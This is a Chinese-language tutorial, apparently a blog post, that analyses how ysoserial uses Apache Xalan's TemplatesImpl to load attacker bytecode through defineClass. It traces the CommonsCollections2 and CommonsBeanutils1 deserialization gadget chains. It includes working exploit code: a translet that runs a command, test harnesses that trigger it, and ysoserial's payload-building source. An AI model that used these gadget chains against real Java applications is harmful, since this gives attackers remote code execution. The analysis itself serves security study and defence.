前言:
看了ysoserial源码可以发现,其Gadgets最核心的就是使用TemplatesImpl来加载恶意代码,进而执行命令。下面我们对TemplatesImpl的加载原理进行刨析
基础:
想理解TemplatesImpl是如何加载代码的,首先我们需要理解ClassLoader即 Java 中负责加载类的重要组件,ClassLoader负责从各种来源(如文件系统、网络等)加载类定义,并将其转换为 Java 虚拟机能够执行的字节码。很底层的实现方式我们目前还不需要了解,但是要对ClassLoader有一定的认识:
ClassLoader 的主要作用包括:
- 类加载: 从指定的位置(文件系统、网络等)加载类定义。
- 类转换: 将加载的类定义转换为 JVM 可执行的字节码。
- 类隔离: 不同的 ClassLoader 可以加载不同版本或来源的同名类,提供类隔离功能。
- 安全控制: ClassLoader 可以根据安全策略控制哪些类可以被加载和使用。
ClassLoader 有几个重要的方法:
loadClass(String name)
: 根据类名加载类定义。defineClass(String name, byte[] b, int off, int len)
: 将字节数组转换为 Class 对象。这是一个受保护的方法,通常由子类重写实现。findClass(String name)
: 查找并加载指定名称的类。通常由子类重写实现。
其中 defineClass方法是最关键的,它将字节数组转换为 Class 对象。该方法的参数包括:
name
: 类的全限定名b
: 包含类定义的字节数组off
: 字节数组中类定义的起始位置len
: 类定义的长度
使用 defineClass 方法可以动态地生成和加载类。言外之意我们只要能调用到defineClass并传入对应的字节数组我们就可以执行其方法。
测试代码如下,首先我们新建个类StubTransletPayload:
import org.apache.xalan.xsltc.runtime.AbstractTranslet;
public static class StubTransletPayload extends AbstractTranslet {
private static final long serialVersionUID = -5971610431559700674L;
public StubTransletPayload() throws Exception {
Runtime.getRuntime().exec("calc");
}
@Override
public void transform(org.apache.xalan.xsltc.DOM dom, org.apache.xml.serializer.SerializationHandler[] serializationHandlers) throws org.apache.xalan.xsltc.TransletException {
}
@Override
public void transform(org.apache.xalan.xsltc.DOM dom, org.apache.xml.dtm.DTMAxisIterator dtmAxisIterator, org.apache.xml.serializer.SerializationHandler serializationHandler) throws org.apache.xalan.xsltc.TransletException {
}
}
然后使用defineClass调用,但是需要注意defineClass为protected,我们只能通过反射进行调用:
public void test() throws Exception{
byte[] classBytes = ysoserial_ClassFiles.classAsBytes(MyTemplatesImpl.StubTransletPayload.class);
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class runcomm= (Class) defineClass.invoke(ClassLoader.getSystemClassLoader(), "StubTransletPayload", classBytes, 0, classBytes.length);
runcomm.newInstance();
}
执行后发现成功弹出计算器,可以看出只要我们能按照defineClass参数要求传入我们的恶意数据就可以被执行,但是我们如何才能调用到defineClass,这里我们就引出了TemplatesImpl,我们使用TemplatesImpl来加载defineClass。
原理:
首先我们需要大概理解下org.apache.xalan.xsltc.trax.TemplatesImpl,其是 Apache Xalan XSLTC 项目中一个重要的类,具体Apache Xalan XSLTC作用如下:
Apache Xalan XSLTC 是 Apache Xalan 项目中的一个重要组件,它的主要功能包括:
-
XSLT 转换引擎:
- XSLTC 提供了一个高性能的 XSLT 转换引擎,能够快速地将 XML 数据转换为 HTML、Text 等输出格式。
- 它通过将 XSLT 模板编译为高效的字节码来提高转换速度,并支持动态编译和缓存。
-
模板处理:
- XSLTC 包含了一个 TemplatesImpl 类,用于管理和执行 XSLT 模板。
- 开发者可以通过 TemplatesImpl 在运行时动态加载和编译 XSLT 模板,实现模板的动态更新。
-
性能优化:
- XSLTC 采用了多种性能优化技术,如字节码生成、运行时编译、缓存等,显著提高了 XSLT 转换的效率。
- 这使得 XSLTC 在需要大量 XSLT 转换的场景中表现优秀,例如 Web 应用程序、内容管理系统等。
-
可扩展性:
- XSLTC 提供了丰富的 API,允许开发者根据需求进行扩展和定制,比如自定义输出处理、错误处理等。
- 开发者可以通过继承和重写 XSLTC 中的关键类来实现自定义的 XSLT 处理逻辑。
-
跨平台支持:
- XSLTC 是用 Java 开发的,因此具有良好的跨平台性,可以在各种操作系统上运行。
- 这使得 XSLTC 在异构环境中具有很好的适用性。
总的来说, Apache Xalan XSLTC 是一个功能强大、性能优秀的 XSLT 转换引擎,广泛应用于需要大量 XML 到 HTML/Text 等转换的场景中。它的模板处理能力、可扩展性以及跨平台特性,使其成为一个非常实用的 XML 处理工具,所以在现实场景中由于其功能的强大,大部分项目都会包含此jar包,这样攻击的成功性就很高
下面看下TemplatesImpl的代码哪里调用了defineClass,在内部TransletClassLoader类中调用了defineClass
向上看在defineTransletClasses方法中调用了defineClass,这里需要注意其对ABSTRACT_TRANSLET进行了比对,即父类必须为AbstractTranslet才可以,这就是为何上面我们编写的StubTransletPayload方法需要继承AbstractTranslet:
private static String ABSTRACT_TRANSLET = "org.apache.xalan.xsltc.runtime.AbstractTranslet";
但是由于 defineTransletClasses是私有方法,继续向上看发现getTransletInstance方法,看逻辑发现_name不能为空且_class必须为空
最后可以发现newTransformer方法调用了getTransletInstance,所以只要我们能调用到TemplatesImpl的getTransletInstance方法,且对应的值能符合要求就能执行命令:
下面我们先放出测试代码:
public void test1() throws Exception{
TemplatesImpl obj = new TemplatesImpl();
byte[] classBytes = ysoserial_ClassFiles.classAsBytes(MyTemplatesImpl.StubTransletPayload.class);
ysoserial_reflect.setFieldValue(obj, "_bytecodes", new byte[][]{classBytes});
ysoserial_reflect.setFieldValue(obj, "_name", "StubTransletPayload");
obj.newTransformer();
}
按照上面的分析我们需要将_bytecodes设置为我们的攻击代码的字节码,_name不能为空,_class默认为空,这里不用设置。
执行后可以发现成功的弹出了计算器,完成命令执行。
执行顺序如下:
newTransformer --> getTransletInstance --> defineTransletClasses -->defineClass
但是这里需要注意上次还有getOutputProperties方法可以调用到newTransformer
所以我们只要能调用到getOutputProperties,newTransformer,getTransletInstance或defineTransletClasses四个任意一个方法都可以最终执行。
ysoserial源码:
下面我们看下ysoserial是如何实现,首先看代码:
public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory ) throws Exception {
// 使用 tplClass 参数创建一个新的 TemplatesImpl 实例,并将其赋值给局部变量 templates。
final T templates = tplClass.newInstance();
// 创建一个 ClassPool 对象,用于动态修改 Java 类。
ClassPool pool = ClassPool.getDefault();
// 将 StubTransletPayload 类和抽象 Translet 类的路径添加到 ClassPool 中。
pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
pool.insertClassPath(new ClassClassPath(abstTranslet));
// 从 ClassPool 中获取 StubTransletPayload 类的 CtClass 对象。
final CtClass clazz = pool.get(StubTransletPayload.class.getName());
// 构造一个字符串,表示要在类的静态初始化块中执行的命令。
String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replace("\\", "\\\\").replace("\"", "\\\"") + "\");";
// 将这个命令插入到 StubTransletPayload 类的类初始化块中。
clazz.makeClassInitializer().insertAfter(cmd);
// 为 StubTransletPayload 类设置一个新的随机名称,以避免重复利用时出现 PermGen 内存耗尽的问题。
clazz.setName("ysoserial.Pwner" + System.nanoTime());
// 获取抽象 Translet 类的 CtClass 对象,并将其设置为 StubTransletPayload 类的父类。
CtClass superC = pool.get(abstTranslet.getName());
clazz.setSuperclass(superC);
// 将修改后的 StubTransletPayload 类的字节码保存到 classBytes 变量中。
final byte[] classBytes = clazz.toBytecode();
// 使用反射将 classBytes 和 Foo 类的字节码设置到 templates 对象的 _bytecodes 字段中。
ysoserial_reflect.setFieldValue(templates, "_bytecodes", new byte[][] {
classBytes, ysoserial_ClassFiles.classAsBytes(Foo.class)
});
// 使用反射将 "Pwnr" 字符串设置到 templates 对象的 _name 字段中。
ysoserial_reflect.setFieldValue(templates, "_name", "Pwnr");
// 创建一个 TransformerFactory 实例,并将其设置到 templates 对象的 _tfactory 字段中。
ysoserial_reflect.setFieldValue(templates, "_tfactory", transFactory.newInstance());
// 返回修改后的 templates 对象。
return templates;
}
public static Object createTemplatesImpl ( final String command ) throws Exception {
// 检查系统属性 properXalan 的值。如果该属性为 true,则使用 Xalan 库中的 TemplatesImpl 类。否则,使用默认的 TemplatesImpl 类。
if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) {
return createTemplatesImpl(
command,
Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), //Xalan 库中的 TemplatesImpl 类
Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), //Xalan 库中的抽象 Translet 类
Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl")); //Xalan 库中的 TransformerFactory 实现类
}
return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class);
}
ysoserial的代码更加的健壮,其原理和之前的一样,首先传入了TemplatesImpl ,AbstractTranslet ,TransformerFactoryImpl三个类,然后使用ClassPool来创建类并返回字节码,而不是使用ysoserial_ClassFiles.classAsBytes返回字节码,另外为了反序列化能执行新建了Foo方法,为了设置SerialVersionUID。
并反射设置了_tfactory参数为TransformerFactoryImpl。
利用CommonsCollections2:
下面我们可以根据CommonsCollections2对调用链有个更好的理解,首先看代码
public class CommonsCollections2 implements ObjectPayload<Queue<Object>> {
public Queue<Object> getObject(final String command) throws Exception {
final Object templates = Gadgets.createTemplatesImpl(command);
// mock method name until armed
final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
// create queue with numbers and basic comparator
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
// stub data for replacement later
queue.add(1);
queue.add(1);
// switch method called by comparator
Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
// switch contents of queue
final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
queueArray[0] = templates;
queueArray[1] = 1;
return queue;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CommonsCollections2.class, args);
}
}
其具体的嵌套为templates->queueArray->PriorityQueue,其返回的反序列化数据会进入PriorityQueue的readObject中进行,下面我们看下具体的调用链,懒得自己运行了,可以参考网上的调用图:
其前期调用如下:
readObject -> heapify -> siftDown -> siftDownUsingComparator
进入siftDownUsingComparator中主要看这两处代码:
这里解释了为何能在此处调用到TransformingComparator的Compare方法,
此处可以看到通过上述代码可以将comparator设置为TransformingComparator。
另外在这里将queue的第一个数组设置为了templates
所以当执行到此处我们的c就是我们的攻击类TemplatesImpl
然后进入 Compare方法,其中obj1为我们的需要执行的类TemplatesImpl
其中的this.transformer设置如下为InvokerTransformer类
这就成功进入了InvokerTransformer的transform方法:
到这里我们可以看到cls为我们的TemplatesImpl类,只要能保住this.iMethodName为newTransformer就可以执行,所以就看到如下代码:
这就可以成功跳转到TemplatesImpl的newTransformer方法执行命令
利用CommonsBeanutils1:
看下新瓶装旧酒:
一样的套路,但是也简单看下,先看下具体的流程
相同的进入PriorityQueue的readObject -> heapify -> siftDown -> siftDownUsingComparator
其中comparator为BeanComparator,参数为我们编写的调用链templates
设置comparator为BeanComparator代码
设置queue调用链templates代码
然后进入BeanComparator的compare方法:
此时compare中参数为我们的调用链,this.property为outputProperties
这里需要注意
PropertyUtils.getProperty(o1, this.property);
PropertyUtils.getProperty(o1, this.property)是 Apache Commons BeanUtils 库中的一个常用方法,它的主要作用是获取一个对象o1中指定属性this.property 的值,这里在调用 PropertyUtils.getProperty(TemplatesImpl, "outputProperties") 时,它会尝试调用 TemplatesImpl 类中的 getoutputProperties() 方法来获取 outputProperties 属性的值。
然后就会进入到TemplatesImpl的getoutputProperties方法,进而执行newTransformer最终执行我们的恶意代码。
总结:
最后对TemplatesImpl做个总结,其本质上就是通过TemplatesImpl调用defineClass达到执行任意字节码的目的,外层调用链这里对CommonsBeanutils1和CommonsCollections2进行了分析,分别利用的是commons-beanutils和org.apache.commons:commons-collections4包,想要执行恶意代码,就一定要加载TemplatesImpl的getOutputProperties,newTransformer,getTransletInstance或defineTransletClasses四个任意一个方法才能够最终调用到defineClass。所以一般采用PriorityQueue来达到目的
PriorityQueue的利用也是相同的套路,主要是readObject -> heapify -> siftDown -> siftDownUsingComparator
通过如下可以设置,进而可以调用**的compare方法。
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, **);
并且此时的两个参数为我们通过反射设置的攻击代码TemplatesImpl:
进入到**的 compare方法后,可以根据具体的代码逻辑,通过反射的方式设置**的内部数据
然后从**的 compare方法进入到TemplatesImpl代码中,当然后面还可以走其他流程,反正注意传入的 compare参数和调用逻辑能最后调用到入口即可